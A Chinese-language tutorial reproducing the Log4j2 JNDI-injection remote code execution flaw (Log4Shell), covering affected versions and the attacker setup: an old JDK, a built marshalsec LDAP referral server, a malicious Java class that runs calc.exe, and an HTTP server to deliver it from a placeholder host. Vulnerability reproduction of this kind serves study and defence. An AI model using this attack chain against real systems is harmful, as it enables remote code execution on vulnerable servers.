Apache Log4j2远程代码实施漏洞复现
发布时间:2021-12-13 09:20 所属栏目:53 来源:互联网
导读:漏洞原理 log4j2版本 log4j-2.15.0-rc2 可由JNDI注入实现远程代码执行。 影响版本 Log4j2.x=2.14.1 漏洞复现 漏洞分析的可以参考逐日实验室的这篇:https://mp.weixin.qq.com/s/l7iclJRegADs3oiEdcgAvQ 准备环境 把受影响的jar包拖进随手建立的一个java项目,
漏洞原理 log4j2版本 < log4j-2.15.0-rc2 可由JNDI注入实现远程代码执行。 影响版本 Log4j2.x<=2.14.1 漏洞复现 漏洞分析的可以参考逐日实验室的这篇:https://mp.weixin.qq.com/s/l7iclJRegADs3oiEdcgAvQ 准备环境 把受影响的jar包拖进随手建立的一个java项目,这里部署jar包步骤就不写了,网上一搜傻瓜式教程都有。 image.png image.png 攻击机环境搭建,这里我用的vps(师兄的,因为我的是Windows。)jdk版本最好<=8u191,基于ldap的利用方式,适用jdk版本:JDK 11.0.1、8u191、7u201、6u211之前。 这里我的java版本是 curl http://www.joaomatosf.com/rnp/java_files/jdk-8u20-linux-x64.tar.gz -o jdk-8u20-linux-x64.tar.gz tar zxvf jdk-8u20-linux-x64.tar.gz rm -rf /usr/bin/java* ln -s /opt/jdk1.8.0_20/bin/j* /usr/bin image.png 下载marshalsec(我这里已经安装好): git clone https://github.com/mbechler/marshalsec.git image.png 然后安装maven: apt-get install maven 然后使用maven编译marshalsec成jar包,我们先进入下载的marshalsec文件中运行: mvn clean package -DskipTests 都成功后,编译恶意类代码robots.java 再用javac编译成robots.class文件 javac robots.java import java.lang.Runtime; import java.lang.Process; public class robots{ static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {"calc.exe"}; Process pc = rt.exec(commands); pc.waitFor(); } catch (Exception e) { // do nothing } } } image.png 搭建http服务传输恶意class文件 python -m SimpleHTTPServer 80 45e13ef22cd9954b27afb68b660169d.png 然后我们借助marshalsec项目,启动一个LDAP服务器,监听9999端口,这里的ip为vps的ip java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://x.x.x.x/#robots" 9999 (编辑:ASP站长网) |
相关内容
网友评论
推荐文章
热点阅读